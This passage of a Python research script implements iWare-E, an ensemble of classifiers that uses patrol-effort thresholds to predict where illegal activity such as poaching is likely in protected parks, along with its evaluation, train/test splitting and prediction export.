if return_var:
var = [x**2 for x in std]
return predictions, var
else:
return predictions
# def gpr_get_var(self, x):
# _, std = self.predict(x, return_std=True)
#
# return [x**2 for x in std]
GaussianProcessRegressor.predict_proba = gpr_predict_proba
# GaussianProcessRegressor.get_var = gpr_get_var
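# Quick numeric check of the squashing above (illustrative): a regression mean
# of 0.5 gives prob = 0.5, a mean of 1.5 gives 1 / (1 + e**1) ~= 0.27, so larger
# regression outputs shift probability mass to the second returned column (1 - prob).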
def rf_predict_proba(self, x, return_var=False, train_x=None):
predictions = self.predict_proba_orig(x)
import forestci as fci
if return_var:
assert train_x is not None
var = fci.random_forest_error(self, train_x, x)
return predictions, var
else:
return predictions
RandomForestClassifier.predict_proba_orig = RandomForestClassifier.predict_proba
RandomForestClassifier.predict_proba = rf_predict_proba
###########################################################
# utility functions
###########################################################
# given training and testing sets, normalize data to zero mean, unit variance
def normalize_data(train, test):
scaler = StandardScaler()
# fit only on training data
scaler.fit(train)
# apply normalization to training and test data
train = scaler.transform(train)
test = scaler.transform(test)
return train, test
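# Illustrative check of normalize_data (made-up values): the scaler is fit on the
# training split only and then applied to both splits, e.g.
#   normalize_data(np.array([[0., 10.], [2., 30.]]), np.array([[1., 20.]]))
# returns a test row of [[0., 0.]] because each test value equals the training mean
# of its column.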
# determine the classification threshold by scanning candidate values and
# scoring each by F1, precision, recall and AUPRC
def determine_threshold(label, predict_test_pos_probs, num_thresholds=50):
# TODO: previously, used tpr-(1-fpr)
# fpr, tpr, thresholds = metrics.roc_curve(label, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
# or maybe scaled, like 2*tpr - (1-fpr)?
thresholds = np.linspace(0, 1, num_thresholds)
f1 = np.zeros(thresholds.size)
precision = np.zeros(thresholds.size)
recall = np.zeros(thresholds.size)
auprc = np.zeros(thresholds.size)
for i in range(num_thresholds):
predict_labels = predict_test_pos_probs > thresholds[i]
predict_labels = predict_labels.astype(int)
f1[i] = metrics.f1_score(label, predict_labels)
precision[i] = metrics.precision_score(label, predict_labels, pos_label=POSITIVE_LABEL)
recall[i] = metrics.recall_score(label, predict_labels, pos_label=POSITIVE_LABEL)
precision_vals, recall_vals, _ = metrics.precision_recall_curve(label, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
auprc[i] = metrics.auc(recall_vals, precision_vals)
if VERBOSE:
print('threshold: {:.4f} | f1: {:.4f}, precision: {:.4f}, recall: {:.4f}, AUPRC: {:.4f}'.format(thresholds[i], f1[i], precision[i], recall[i], auprc[i]))
# opt = np.argmax(f1)
opt = np.argmax(auprc)
print('optimal threshold {:.4f}, with f1 {:.4f}, precision {:.4f}, recall {:.4f}, AUPRC {:.4f}'.format(thresholds[opt], f1[opt], precision[opt], recall[opt], auprc[opt]))
return thresholds[opt]
# evaluate the ML model on the test set by printing all relevant metrics
def evaluate_results(test_y, predict_test_pos_probs):
output = []
# compute optimal threshold and determine labels
opt_threshold = determine_threshold(test_y, predict_test_pos_probs)
predict_test = (predict_test_pos_probs > opt_threshold).astype(int)
predict_test_neg_probs = np.ones(predict_test_pos_probs.shape) - predict_test_pos_probs
predict_test_probs = np.concatenate((predict_test_neg_probs.reshape(1,-1), predict_test_pos_probs.reshape(1,-1)), axis=0).transpose()
# select the prediction column with probability of assigned label
predict_test_label_probs = predict_test_probs[[i for i in range(predict_test.shape[0])], tuple(predict_test)]
fpr, tpr, _ = metrics.roc_curve(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
output.append('AUC: {:.5f}'.format(metrics.auc(fpr, tpr)))
precision_vals, recall_vals, _ = metrics.precision_recall_curve(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)
output.append('AUPRC: {:.5f}'.format(metrics.auc(recall_vals, precision_vals))) # area under precision-recall curve
#output.append('average precision score: {:.5f}'.format(metrics.average_precision_score(test_y, predict_test_pos_probs, pos_label=POSITIVE_LABEL)))
output.append('precision: {:.5f}'.format(metrics.precision_score(test_y, predict_test, pos_label=POSITIVE_LABEL)))
recall = metrics.recall_score(test_y, predict_test, pos_label=POSITIVE_LABEL)
output.append('recall: {:.5f}'.format(recall))
output.append('F1 score: {:.5f}'.format(metrics.f1_score(test_y, predict_test, pos_label=POSITIVE_LABEL)))
percent_positive = np.where(predict_test == POSITIVE_LABEL)[0].shape[0] / predict_test.shape[0]
l_and_l = recall ** 2 / percent_positive
max_ll = 1 / (test_y.sum() / test_y.shape[0])
output.append('L&L %: {:.5f} ({:.5f} / {:.5f})'.format(100 * (l_and_l / max_ll), l_and_l, max_ll))
output.append('cross entropy: {:.5f}'.format(metrics.log_loss(test_y, predict_test_probs)))
output.append('average prediction probability: {:.5f}'.format(predict_test_label_probs.mean()))
output.append('accuracy: {:.5f}'.format(metrics.accuracy_score(test_y, predict_test)))
output.append('cohen\'s kappa: {:.5f}'.format(metrics.cohen_kappa_score(test_y, predict_test))) # measures inter-annotator agreement
output.append('F-beta score: {:.5f}'.format(metrics.fbeta_score(test_y, predict_test, 2, pos_label=POSITIVE_LABEL))) # commonly .5, 1, or 2. if 1, then same as f1
return '\n'.join(output)
###########################################################
# setup data
###########################################################
def setup_data(x_filename, y_filename):
# read in features
features_raw = pd.read_csv(x_filename)
features_raw.drop(columns=features_raw.columns[0], inplace=True)
patrol_effort = features_raw['current_patrol_effort'].values
section_col = features_raw['section'].values
year_col = features_raw['year'].values
# features_raw.drop(columns=['temp', 'precip'], inplace=True)
# don't use current_patrol_effort as a feature
features_raw.drop(columns='current_patrol_effort', inplace=True)
# read in labels
labels_raw = pd.read_csv(y_filename)
labels_raw.drop(columns=labels_raw.columns[0], inplace=True)
features = features_raw.values[:, NUM_COLS_TO_SKIP:]
labels = labels_raw.values[:, NUM_COLS_TO_SKIP]
feature_names = list(features_raw.columns)[NUM_COLS_TO_SKIP:]
print('feature names {}'.format(feature_names))
return features_raw, features, feature_names, labels, patrol_effort, section_col, year_col
###########################################################
# iWare-E class
###########################################################
class iWare:
def __init__(self, method, num_classifiers, park, year):
self.method = method
self.num_classifiers = num_classifiers
self.park = park
self.year = year
self.patrol_thresholds = None
self.classifiers = None
self.weights = None # weights for classifiers
self.train_x_norm = None # normalized numpy array of train_x
# get classifier used as base estimator in bagging classifier
def get_base_estimator(self):
if self.method == 'gp':
# kernel = ConstantKernel(1e-20, (1e-25, 1e-15))* RBF(length_scale=1)
kernel = 1.0 * RBF(length_scale=1.0)
#kernel = 1.0 * RBF(length_scale=20.0)
# look at Matern kernel?
# ********
# Aaron suggests printing out length scale
#kernel = 1.0 * RBF(length_scale=1.0, length_scale_bounds=(1e-05, 1e5))
# optimizer=None to keep kernel parameters in place
# n_restarts_optimizer=5,
base_estimator = GaussianProcessClassifier(kernel=kernel, random_state=RANDOM_SEED, warm_start=True, max_iter_predict=100, n_jobs=-1)
# base_estimator = GaussianProcessRegressor(kernel=kernel, random_state=RANDOM_SEED, n_restarts_optimizer=0, normalize_y=True)
elif self.method == 'svm':
base_estimator = SVC(gamma='auto', random_state=RANDOM_SEED)
elif self.method == 'linear-svc':
base_estimator = LinearSVC(max_iter=5000, random_state=RANDOM_SEED)
elif self.method == 'dt':
base_estimator = tree.DecisionTreeClassifier(random_state=RANDOM_SEED)
else:
raise Exception('method \'{}\' not recognized'.format(self.method))
return base_estimator
# get overall classifier to use
def get_classifier(self, use_balanced):
if self.method == 'rf':
return RandomForestClassifier(n_estimators=NUM_ESTIMATORS,
criterion='gini', max_depth=None, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.0,
max_features=MAX_FEATURES, max_leaf_nodes=None,
min_impurity_decrease=0.0, min_impurity_split=None,
bootstrap=True, oob_score=False, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE,
warm_start=False, class_weight=None)
# return RandomForestRegressor(n_estimators=NUM_ESTIMATORS,
# criterion='mse', max_depth=None, min_samples_split=2,
# min_samples_leaf=1, min_weight_fraction_leaf=0.0,
# max_features=MAX_FEATURES, max_leaf_nodes=None,
# min_impurity_decrease=0.0, min_impurity_split=None,
# bootstrap=True, oob_score=False,
# n_jobs=N_JOBS, random_state=RANDOM_SEED,
# verbose=VERBOSE, warm_start=False)
base_estimator = self.get_base_estimator()
# GPs don't need a bagging classifier
# return base_estimator
if self.method == 'gp':
return base_estimator
# balanced bagging classifier used for datasets with strong label imbalance
# (e.g. SWS in Cambodia)
elif use_balanced:
return BalancedBaggingClassifier(base_estimator=base_estimator,
n_estimators=NUM_ESTIMATORS, max_samples=MAX_SAMPLES,
max_features=MAX_FEATURES,
bootstrap=True, bootstrap_features=False,
oob_score=False, warm_start=False,
sampling_strategy='majority', #sampling_strategy=0.8,
replacement=True, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE)
# non-balanced bagging classifier used for other datasets
else:
return BaggingClassifier(base_estimator=base_estimator,
n_estimators=NUM_ESTIMATORS, max_samples=MAX_SAMPLES,
max_features=MAX_FEATURES,
bootstrap=True, bootstrap_features=False,
oob_score=False, warm_start=False, n_jobs=N_JOBS,
random_state=RANDOM_SEED, verbose=VERBOSE)
###########################################################
# classification
###########################################################
def get_patrol_thresholds(self, train_effort):
patrol_threshold_percentile = np.linspace(0, 100, self.num_classifiers, endpoint=False)
patrol_thresholds = np.percentile(train_effort, patrol_threshold_percentile)
print('percentiles {}'.format(patrol_threshold_percentile))
print('patrol thresholds {}'.format(patrol_thresholds))
return patrol_thresholds
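# Worked example (hypothetical numbers): with num_classifiers=4 the percentiles are
# [0, 25, 50, 75]; for train_effort = [0, 1, ..., 99] the thresholds would be roughly
# [0, 24.75, 49.5, 74.25], and classifier i is later trained only on points whose
# patrol effort is at least patrol_thresholds[i] (plus all positive-label points).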
def get_vote_matrix(self):
vote_power = np.identity(self.num_classifiers) # identity matrix
# vote_power = np.tril(np.ones((self.num_classifiers, self.num_classifiers))) # lower triangle
# vote_power = np.triu(np.ones((self.num_classifiers, self.num_classifiers))) # upper triangle
# build triangular vote qualification matrix
# vote_qual = np.triu(np.ones((self.num_classifiers, self.num_classifiers)))
vote_qual = np.ones((self.num_classifiers, self.num_classifiers))
# create combined vote matrix
vote_combine = np.multiply(vote_power, vote_qual)
# normalize so each row sums to 1
vote_combine = vote_combine / vote_combine.sum(1)[:,None]
return vote_combine
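# Illustrative example (hypothetical): with num_classifiers=3 and the identity vote_power
# above, get_vote_matrix() returns the 3x3 identity matrix, so the prediction for a point
# falling in patrol-effort interval j comes only from classifier j. Using the commented-out
# lower-triangle vote_power instead would average classifiers 0..j with weight 1/(j+1).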
# train a set of classifiers using provided data
def train_classifiers(self, train_x, train_y, train_effort, use_balanced):
classifiers = []
for i in range(self.num_classifiers):
#### filter data
# get training data for this threshold
idx = np.where(np.logical_or(train_effort >= self.patrol_thresholds[i], train_y == POSITIVE_LABEL))[0]
if i > 0 and self.patrol_thresholds[i] == self.patrol_thresholds[i-1]:
print('threshold {} same as previous, value {}. skipping'.format(i, self.patrol_thresholds[i]))
classifiers.append(None)
continue
if idx.size == 0:
print('no training points found for classifier {}, threshold = {}'.format(i, self.patrol_thresholds[i]))
classifiers.append(None)
continue
train_x_filter = train_x[idx, :]
train_y_filter = train_y[idx]
print('filtered data: {}. num positive labels {}'.format(train_x_filter.shape, np.sum(train_y_filter)))
if np.sum(train_y_filter) == 0:
print('no positive labels in this subset of the training data. skipping classifier {}'.format(i))
classifiers.append(None)
continue
# select and train a classifier
classifier = self.get_classifier(use_balanced)
print('classifier {}, threshold {}, num x {}'.format(i, self.patrol_thresholds[i], train_x_filter.shape))
start_time = time.time()
# fit training data
classifier.fit(train_x_filter, train_y_filter)
print(' train time: {:.2f} seconds, score: {:.5f}'.format(
time.time() - start_time,
classifier.score(train_x_filter, train_y_filter)))
classifiers.append(classifier)
print('-------------------------------------------')
return classifiers
# given a set of trained classifiers, compute optimal weights
def get_classifier_weights(self, classifiers, reserve_x, reserve_y):
# test classifiers on all data points
predictions = []
for i in range(self.num_classifiers):
if classifiers[i] is None:
predictions.append(np.zeros(reserve_y.shape))
continue
curr_predictions = classifiers[i].predict(reserve_x)
predictions.append(curr_predictions)
predictions = np.array(predictions).transpose()
# define loss function
def evaluate_ensemble(weights):
# ensure we don't get NaN values
if np.isnan(weights).any():
return 1e9
weighted_predictions = np.multiply(predictions, weights)
weighted_predictions = np.sum(weighted_predictions, axis=1)
score = metrics.log_loss(reserve_y, weighted_predictions)
return score
# evaluate score
# auprc = metrics.average_precision_score(reserve_y, weighted_predictions, pos_label=POSITIVE_LABEL)
#
# # pass in negative to minimize
# return -auprc
# constrain weights to sum to 1
cons = ({'type': 'eq', 'fun': lambda w: 1 - sum(w)})
# bound weights to be between 0 and 1
bounds = [(0,1)] * self.num_classifiers
# random restarts with random initial weights
#best_weights = np.ones(self.num_classifiers) / self.num_classifiers # default: equal weights
best_weights = None
best_score = 1e9
# ensure we have enough positive samples
unique_vals, unique_counts = np.unique(reserve_y, return_counts=True)
unique_dict = dict(zip(unique_vals, unique_counts))
if VERBOSE:
print(unique_dict)
if 1 not in unique_dict or unique_dict[1] < 5:
print(' not enough positive labels. skipping')
return best_weights
for _ in range(10):
w = np.random.rand(self.num_classifiers)
w = w / np.sum(w)
res = minimize(evaluate_ensemble, w, method='SLSQP', bounds=bounds, constraints=cons)
if res.fun < best_score:
best_weights = res.x
best_score = res.fun
if VERBOSE:
print('best score {}, weights {}'.format(best_score, np.around(best_weights, 3)))
return best_weights
def train_iware(self, all_train_x, all_train_y, all_train_effort, use_balanced=False, nsplits=5):
self.patrol_thresholds = self.get_patrol_thresholds(all_train_effort)
print('shape x', all_train_x.shape)
print('shape y', all_train_y.shape)
print('shape train_effort', all_train_effort.shape)
# print('k-fold cross validation, k = {}'.format(nsplits))
# skf = StratifiedKFold(nsplits, shuffle=True)
#
# all_weights = np.zeros((nsplits, self.num_classifiers, self.num_classifiers))
#
#
#
# # reserve some test data as validation set
# # to assign weights to classifiers
# k = 0
# for train_index, reserve_index in skf.split(all_train_x, all_train_y):
# train_x = all_train_x[train_index]
# train_y = all_train_y[train_index]
# train_effort = all_train_effort[train_index]
#
# reserve_x = all_train_x[reserve_index]
# reserve_y = all_train_y[reserve_index]
# reserve_effort = all_train_effort[reserve_index]
#
#
# print('-------------------------------------------')
# print('training classifiers with limited train data, k = {}'.format(k))
# print('-------------------------------------------')
#
# classifiers = self.train_classifiers(train_x, train_y, train_effort, use_balanced)
#
#
# print('-------------------------------------------')
# print('finding weights for classifiers')
# print('-------------------------------------------')
#
# # ----------------------------------------------
# # find appropriate weights for classifiers
# # ----------------------------------------------
# for i in range(self.num_classifiers):
# #### filter data
# # find points within specified threshold
# if i == 0:
# idx = np.where(reserve_effort < self.patrol_thresholds[i+1])[0]
# elif i == self.num_classifiers - 1:
# idx = np.where(self.patrol_thresholds[i] <= reserve_effort)[0]
# else:
# idx = np.where(np.logical_and(self.patrol_thresholds[i] <= reserve_effort, reserve_effort < self.patrol_thresholds[i+1]))[0]
#
# filter_x = reserve_x[idx]
# filter_y = reserve_y[idx]
# print('classifier {}: {} points, {} positive'.format(i, filter_x.shape[0], np.count_nonzero(filter_y == POSITIVE_LABEL)))
# weights = self.get_classifier_weights(classifiers, filter_x, filter_y)
#
# # if weights were not set, assign classifier weight to just 1 at classifier location (corresponding to the matrix diagonal)
# if weights is None:
# weights = np.zeros(self.num_classifiers)
# weights[i] = 1
#
# all_weights[k, i, :] = weights
#
# k += 1
#
# # average all classifier weights
# self.weights = all_weights.mean(0)
# print('weights: ', np.around(self.weights, 4))
# self.weights = np.eye(self.num_classifiers)
self.weights = self.get_vote_matrix()
print('-------------------------------------------')
print('training classifiers with all train data')
print('-------------------------------------------')
self.classifiers = self.train_classifiers(all_train_x, all_train_y, all_train_effort, use_balanced)
# TODO: does this need to be moved?
# need train_x later for random forest variance
if self.method == 'rf':
self.train_x_norm = np.copy(all_train_x)
def test_iware(self, test_x, test_y, test_effort, output_path):
if self.patrol_thresholds is None:
raise ValueError('No patrol thresholds. train_iware() may not have been called.')
if self.classifiers is None:
raise ValueError('No classifiers. train_iware() may not have been called.')
if self.weights is None:
raise ValueError('No weights. train_iware() may not have been called.')
for i in range(len(self.weights)):
print('classifier {}, weights {}, sum {}'.format(i, np.around(self.weights[i], 4), self.weights[i].sum()))
# # test classifiers on all data points
# predictions = []
# for i in range(self.num_classifiers):
# if self.classifiers[i] is None:
# # predictions.append(None)
# predictions.append(np.zeros(test_x.shape))
# continue
#
# curr_predictions = self.classifiers[i].predict(test_x)
# predictions.append(curr_predictions)
# predictions = np.array(predictions).transpose()
#
# weighted_predictions = np.multiply(predictions, self.weights)
# weighted_predictions = np.sum(weighted_predictions, axis=1)
#
# evaluate_results(test_y, weighted_predictions)
#
# return
###########
# predicted probability of illegal activity observation on each data point
num_test = test_y.shape[0]
weighted_predictions = np.zeros(num_test)
weighted_variances = np.zeros(num_test)
all_predictions = np.zeros((num_test, self.num_classifiers))
if self.method == 'gp' or self.method == 'rf':
all_variances = np.zeros((num_test, self.num_classifiers))
# TODO: can i do this portion more efficiently?
# compute the classification interval for each point
classification = np.zeros(num_test)
for i in range(num_test):
smaller_thresholds = np.where(test_effort[i] > self.patrol_thresholds)[0]
# patrol effort at this point may be less than all threshold values
if len(smaller_thresholds) == 0:
classification[i] = 0
else:
classification[i] = smaller_thresholds[-1]
classification = classification.astype(int)
for i in range(self.num_classifiers):
if self.classifiers[i] is None:
print('classifier {} is none; skipping'.format(i))
continue
start_time = time.time()
# compute variance
if self.method == 'gp' or self.method == 'rf':
if self.method == 'rf':
assert self.train_x_norm is not None
curr_predictions, curr_variances = self.classifiers[i].predict_proba(test_x, return_var=True, train_x=self.train_x_norm)
elif self.method == 'gp':
# curr_predictions, curr_variances = self.classifiers[i].predict_proba(test_x, return_var=True)
curr_predictions = self.classifiers[i].predict_proba(test_x)
curr_variances = self.classifiers[i].predict_var(test_x)
# curr_variances = curr_variances[:, 1]
# normalize variance values
curr_variances = curr_variances - np.min(curr_variances)
curr_variances = curr_variances / np.max(curr_variances)
all_variances[:, i] = curr_variances
# this method doesn't allow variance :(
else:
curr_predictions = self.classifiers[i].predict_proba(test_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
all_predictions[:, i] = curr_predictions
# TODO: make more efficient!
multiplier = np.zeros(num_test)
for j in range(num_test):
multiplier[j] = self.weights[classification[j]][i]
# scale increase by the multiplier for each data point
weighted_predictions += np.multiply(curr_predictions, multiplier)
if self.method == 'gp' or self.method == 'rf':
weighted_variances += np.multiply(curr_variances, multiplier)
print(' classifier {}, test time {:.3f}'.format(i, time.time() - start_time))
# save out predictions to CSV
print(' save out predictions...')
predictions_df = pd.DataFrame(data=all_predictions, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
predictions_out = '{}/{}_{}_predictions.csv'.format(output_path, self.method, self.num_classifiers)
print(' {}'.format(predictions_out))
predictions_df.to_csv(predictions_out)
# save out variances to CSV
if self.method == 'gp' or self.method == 'rf':
print(' save out variances...')
variances_df = pd.DataFrame(data=all_variances, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
variances_df.to_csv('{}/{}_{}_variances.csv'.format(output_path, self.method, self.num_classifiers))
combined_df = pd.DataFrame({'predictions': weighted_predictions, 'variances': weighted_variances})
combined_df.to_csv('{}/{}_{}_weighted_pred_var.csv'.format(output_path, self.method, self.num_classifiers))
### evaluate
results = evaluate_results(test_y, weighted_predictions)
print(results)
f = open('{}/{}_{}.txt'.format(output_path, self.method, self.num_classifiers), 'w')
f.write('park {}, test year {}\n'.format(self.park, self.year))
f.write('method {}, num_classifiers {}\n'.format(self.method, self.num_classifiers))
f.write('thresholds {}\n'.format(self.patrol_thresholds))
f.write('\n\n')
f.write(results)
f.write('\n\n\n')
f.write('weights\n{}\n'.format(np.around(self.weights, 5)))
f.close()
pickle_data = {'park': self.park,
'num_classifiers': self.num_classifiers, 'method': self.method,
#'classifiers': self.classifiers,
'weights': self.weights,
'thresholds': self.patrol_thresholds,
'predictions': weighted_predictions,
'results': results
}
pickle.dump(pickle_data, open('{}/{}_{}.p'.format(output_path, self.method, self.num_classifiers), 'wb'))
# # display performance on only first classifier
# # only using the first is the same as no iWare-E ensembling
# print('-------------------------------------------')
# print('testing - only first classifier')
# print('-------------------------------------------')
#
# predict_test_probs = classifiers[0].predict_proba(test_x)
# predict_test_pos_probs = predict_test_probs[:,1]
# evaluate_results(test_y, predict_test_pos_probs)
#
# # write out predictions to file
# predict_out = pd.DataFrame(data={'predictions': predict_test_pos_probs, 'labels': test_y})
# predict_out.to_csv('output/test_predictions_{}_{}_method_{}.csv'.format(self.park, TEST_YEAR, self.method))
###########################################################
# run train/test code to evaluate predictive models
###########################################################
# prepare data: split into train/test and normalize
def train_test_split_by_year(self, features, labels, patrol_effort, year_col, test_year, test_section=None, section_col=None):
# specifying the section is optional
if test_section is not None:
assert section_col is not None
if test_section:
# just one section of test data
train_idx = np.where(np.logical_or(year_col < test_year, section_col < test_section))[0]
test_idx = np.where(np.logical_and(year_col == test_year, section_col == test_section))[0]
else:
# full year of test data
train_idx = np.where(year_col < test_year)[0]
test_idx = np.where(year_col == test_year)[0]
train_x = features[train_idx, :]
train_y = labels[train_idx]
train_effort = patrol_effort[train_idx]
test_x = features[test_idx, :]
test_y = labels[test_idx]
test_effort = patrol_effort[test_idx]
train_x, test_x = normalize_data(train_x, test_x)
print('train x, y', train_x.shape, train_y.shape)
print('test x, y ', test_x.shape, test_y.shape)
print('patrol effort train, test ', train_effort.shape, test_effort.shape)
return train_x, test_x, train_y, test_y, train_effort, test_effort
###########################################################
# iWare-E for predicting future risk
###########################################################
# use all provided data to make predictions
def make_predictions(self, predict_section, features_raw, features, feature_names,
labels, patrol_effort, section_col, input_static_feats, output_path,
test_temp=None, test_precip=None, gpp_filename=None):
print('time to make some predictions!')
predict_year = self.year
# ----------------------------------------------
# get training data
# ----------------------------------------------
# use all data before specified (predict_year, predict_section)
train_idx = np.where(np.logical_or(features_raw['year'] < predict_year,
np.logical_and(features_raw['year'] == predict_year, features_raw['section'] < predict_section)))[0]
print(' features shape', features_raw.shape)
print(' train_idx ', len(train_idx), train_idx)
train_x = features[train_idx, :]
train_y = labels[train_idx]
train_patrol_effort = patrol_effort[train_idx]
# ----------------------------------------------
# get data to predict on
# ----------------------------------------------
if predict_section == 0:
prev_year = predict_year - 1
num_section = np.max(section_col)
print(' num section', num_section)
prev_section = num_section
else:
prev_year = predict_year
prev_section = predict_section - 1
print(' test section: year {}, section {}'.format(predict_year, predict_section))
print(' prev section: year {}, section {}'.format(prev_year, prev_section))
# ----------------------------------------------
# set up data arrays
# ----------------------------------------------
# get past patrol effort for the test section
prev_section_idx = np.where(np.logical_and(features_raw['year'] == prev_year, features_raw['section'] == prev_section))
past_patrol_effort = patrol_effort[prev_section_idx]
prev_section_spatial_id = features_raw['spatial_id'].values[prev_section_idx]
patrol_effort_df = pd.DataFrame({'spatial_id': prev_section_spatial_id,
'past_patrol_effort': past_patrol_effort})
# get all static features
static_features = pd.read_csv(input_static_feats)
static_features.drop(columns=static_features.columns[0], inplace=True)
# create features array and add in past_patrol_effort
predict_x_df = static_features.join(patrol_effort_df.set_index('spatial_id'), on='spatial_id', how='left')
predict_x_df['past_patrol_effort'].fillna(0, inplace=True)
# add climate info
if test_temp is not None and test_precip is not None:
predict_x_df['temp'] = test_temp * np.ones(static_features.shape[0])
predict_x_df['precip'] = test_precip * np.ones(static_features.shape[0])
# add GPP info
if gpp_filename is not None:
new_gpp = pd.read_csv(gpp_filename) # e.g. '../preprocess_consolidate/belum_traponly_combined/1000/output/all_3month/GPP_2019_0.csv'
predict_x_df['gpp'] = new_gpp['2019-0']
# arrange columns to match training data
store_columns = predict_x_df[['spatial_id', 'x', 'y']]
predict_x_df.drop(columns=['spatial_id', 'x', 'y'], inplace=True)
predict_x_df = predict_x_df[feature_names]
predict_x = predict_x_df.values
# normalize data
train_x, predict_x = normalize_data(train_x, predict_x)
# ----------------------------------------------
# train classifiers
# ----------------------------------------------
print('training classifiers on {} points...'.format(train_x.shape))
train_start_time = time.time()
self.train_iware(train_x, train_y, train_patrol_effort) # sets self.classifiers and self.weights
total_train_time = time.time() - train_start_time
print('total train time {:.3f}'.format(total_train_time))
# ----------------------------------------------
# run classifiers to get set of predictions
# ----------------------------------------------
# initialize array to store predictions from each classifier
print('making predictions on year {} section {}... {} points'.format(predict_year, predict_section, predict_x.shape))
final_predictions = np.zeros((predict_x.shape[0], self.num_classifiers))
if self.method == 'gp' or self.method == 'rf':
final_variances = np.zeros((predict_x.shape[0], self.num_classifiers))
# make predictions with each classifier
for i in range(self.num_classifiers):
start_time = time.time()
# this classifier had no training points, so we skip it
if self.classifiers[i] is None:
final_predictions[:, i] = np.zeros((final_predictions.shape[0]))
continue
if self.method == 'gp' or self.method == 'rf':
if self.method == 'rf':
curr_predictions, curr_variances = self.classifiers[i].predict_proba(predict_x, return_var=True, train_x=train_x)
else:
# curr_predictions, curr_variances = self.classifiers[i].predict_proba(predict_x, return_var=True)
curr_predictions = self.classifiers[i].predict_proba(predict_x)
curr_variances = self.classifiers[i].predict_var(predict_x)
# curr_variances = curr_variances[:, 1]
print('variance min {} max {}'.format(np.min(curr_variances), np.max(curr_variances)))
# normalize variance values
# curr_variances = curr_variances - np.min(curr_variances)
# curr_variances = curr_variances / np.max(curr_variances)
final_variances[:, i] = curr_variances
else:
curr_predictions = self.classifiers[i].predict_proba(predict_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
final_predictions[:, i] = curr_predictions
# predict_x_df.to_csv('predict_x.csv', encoding='utf-16')
# np.savetxt('predict_x_norm.csv', predict_x, delimiter=',', encoding='utf-16', fmt='%.3f')
# np.savetxt('train_x.csv', self.train_x_norm, delimiter=',', encoding='utf-16', fmt='%.3e')
# np.savetxt('train_x_float.csv', self.train_x_norm, delimiter=',', encoding='utf-16', fmt='%.3f')
# save out predictions to CSV
print(' save out predictions...')
predictions_df = pd.DataFrame(data=final_predictions, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
predictions_df = pd.concat([store_columns, predictions_df], axis=1)
predictions_filename = '{}/predictions_{}_{}_method_{}_{}.csv'.format(output_path, self.park, predict_year, self.method, self.num_classifiers)
print(' {}'.format(predictions_filename))
predictions_df.to_csv(predictions_filename)
# save out variances to CSV
if self.method == 'gp' or self.method == 'rf':
print(' save out variances...')
variances_df = pd.DataFrame(data=final_variances, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
variances_df = pd.concat([store_columns, variances_df], axis=1)
variances_df.to_csv('{}/variances_{}_{}_method_{}_{}.csv'.format(output_path, self.park, predict_year, self.method, self.num_classifiers))
return predictions_df
# used for post-hoc analysis of field test data
# (we want to ignore the true data and pretend we don't know it)
def field_test_make_predictions(self, predict_year, predict_section, features_raw, features, labels, patrol_effort,
input_static_feats, feature_names):
print('time to make some predictions!')
# ----------------------------------------------
# GET TRAINING DATA
# ----------------------------------------------
# get last quarter of patrol effort
predict_mask = np.logical_and(features_raw['year'] == predict_year, features_raw['section'] == predict_section)
predict_train_idx = np.where(np.logical_not(predict_mask))[0]
train_x = features[predict_train_idx, :]
train_patrol_effort = patrol_effort[predict_train_idx]
train_y = labels[predict_train_idx]
# ----------------------------------------------
# GET DATA FOR PREDICTIONS
# ----------------------------------------------
# get indices from available cells at the specified time interval
predict_idx = np.where(predict_mask)[0]
# get past patrol effort for those available cells
predict_spatial_id = features_raw['spatial_id'].values[predict_idx]
predict_patrol_effort = patrol_effort[predict_idx]
patrol_effort_df = pd.DataFrame({'spatial_id': predict_spatial_id, 'past_patrol_effort': predict_patrol_effort})
# get all static features
static_features = pd.read_csv(input_static_feats)
# create features array
predict_x_df = static_features.join(patrol_effort_df.set_index('spatial_id'), on='Var1', how='left')
predict_x_df['past_patrol_effort'].fillna(0, inplace=True)
predict_x_df.drop(columns=['Var1', 'x', 'y'], inplace=True)
# arrange columns to match training data
predict_x_df = predict_x_df[feature_names]
predict_x = predict_x_df.values
# ----------------------------------------------
# normalize data
# ----------------------------------------------
train_x, predict_x = normalize_data(train_x, predict_x)
# ----------------------------------------------
# train classifiers
# ----------------------------------------------
# print('training classifiers on {} points...'.format(train_x.shape))
train_start_time = time.time()
self.train_iware(train_x, train_y, train_patrol_effort) # sets self.classifiers
total_train_time = time.time() - train_start_time
print('total train time {:.3f}'.format(total_train_time))
# ----------------------------------------------
# run classifiers to get set of predictions
# ----------------------------------------------
# initialize array to store predictions from each classifier
print('making predictions on year {} section {}... {} points'.format(predict_year, predict_section, predict_x.shape))
final_predictions = np.zeros((predict_x.shape[0], self.num_classifiers))
# make predictions with each classifier
for i in range(self.num_classifiers):
start_time = time.time()
# this classifier had no training points, so we skip it
if self.classifiers[i] is None:
final_predictions[:, i] = np.zeros((final_predictions.shape[0]))
continue
curr_predictions = self.classifiers[i].predict_proba(predict_x)
curr_predictions = curr_predictions[:, 1] # probability of positive label
final_predictions[:, i] = curr_predictions
# save out predictions to CSV
print('save out predictions...')
predictions_df = pd.DataFrame(data=final_predictions, columns=['threshold={}'.format(thresh) for thresh in self.patrol_thresholds])
# start indexing from 1 to be consistent with other files
predictions_df.index = np.arange(1, len(predictions_df) + 1)
predictions_df.to_csv('predictions_{}_{}_method_{}.csv'.format(self.park, predict_year, self.method)) #float_format='%.4f',
###########################################################
# variation attempts for filtering data
###########################################################
#### filter data
# get training data for this threshold
# # MY MODIFIED APPROACH
# # makes things run faster, and sometimes get decent results
# # only points within threshold interval
# if i == 0:
# idx = np.where(train_effort < patrol_thresholds[i+1])[0]
# elif i == num_classifiers - 1:
# idx = np.where(train_effort >= patrol_thresholds[i])[0]
# else:
